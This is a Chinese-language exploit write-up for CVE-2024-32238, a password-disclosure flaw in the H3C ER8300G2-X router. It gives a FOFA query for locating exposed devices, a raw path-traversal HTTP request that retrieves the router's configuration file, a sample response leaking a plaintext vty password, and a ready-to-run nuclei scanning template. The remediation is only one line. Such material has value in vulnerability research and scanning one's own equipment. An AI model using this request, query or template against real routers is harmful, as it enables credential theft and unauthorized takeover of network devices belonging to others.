CVE-2024-32238 漏洞复现 poc

免责申明：本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与作者无关！！！

01

—

漏洞名称

H3C ER8300G2-X-密码泄露漏洞

02

—

漏洞影响

版本不详

03

—

漏洞描述

H3C ER8300G2-X易受不正确访问控制的影响。路由器管理系统的密码可以通过管理系统页面登录界面访问。

04

—

FOFA搜索语句

app="H3C-Ent-Router" && title=="ER8300G2-X系统管理"

05

—

漏洞复现

向靶场发送如下数据包

GET /userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; CrOS aarch64 15236.9.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

响应内容如下

HTTP/1.0 200 OK
Connection: close
Content-Length: 159534
Content-Type: application/x-unknown;charset=GB2312
Date: Fri Jul 19 09:49:59 2024
Last-Modified: Fri Jul 19 09:49:59 2024
Server: H3C-Miniware-Webs
1307a8b68287c8219f2864e636d5afaf
  ER8300G2-X/ERHMG2V100D026
$sys
@base
#
        if-type=root
        ifname=root
        name=H3C
        passwd=
#
        auxidletimeout=300
        auxauthmode=password
#1
        vtyname=ttyp0
        vtypasswd=bq123456
        vtyidletimeout=300
        vtypasswdtype=simple
        vtyauthmode=password
#2
        vtyname=ttyp1
        vtypasswd=bq123456
        vtyidletimeout=300
        vtypasswdtype=simple
        vtyauthmode=password
@lanctrl
#
        lanctrl-start-ip=0.0.0.0

其中vtypasswd=bq123456是密码

登录

漏洞复现成功

06

—

nuclei poc

poc文件内容如下

id: CVE-2024-32238
info:
  name: H3C ER8300G2-X - Password Disclosure
  author: securityforeveryone
  severity: critical
  description: |
    H3C ER8300G2-X is vulnerable to Incorrect Access Control. The password for the router's management system can be accessed via the management system page login interface.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-32238
    - https://cvefeed.io/vuln/detail/CVE-2024-32238
    - https://github.com/asdfjkl11/CVE-2024-32238/issues/1
    - https://www.h3c.com/cn/Products_And_Solution/InterConnect/Products/Routers/Products/Enterprise/ER/ER8300G2-X/
    - https://github.com/FuBoLuSec/CVE-2024-32238
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-32238
    cwe-id: CWE-522
    epss-score: 0.00043
    epss-percentile: 0.09279
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="H3C-Ent-Router" && title=="ER8300G2-X系统管理"
  tags: cve,cve2024,leak,h3c
http:
  - raw:
      - |
        GET /userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'vtyname'
          - 'vtypasswd'
          - 'auxauthmode'
        condition: and
      - type: word
        part: content_type
        words:
          - 'application/x-unknown'
      - type: status
        status:
          - 200
# digest: 4a0a004730450220201878cc58288f49ab829ff3270b6f402ba4251f76094e5e2d5f5bc6be824c1102210092e0e556465f7788407d6b160af9f4896d3a26219f756fdbbf1a28b770c083f9:922c64590222798bb761d5b6d8e72950

07

—

修复建议

升级到最新版本。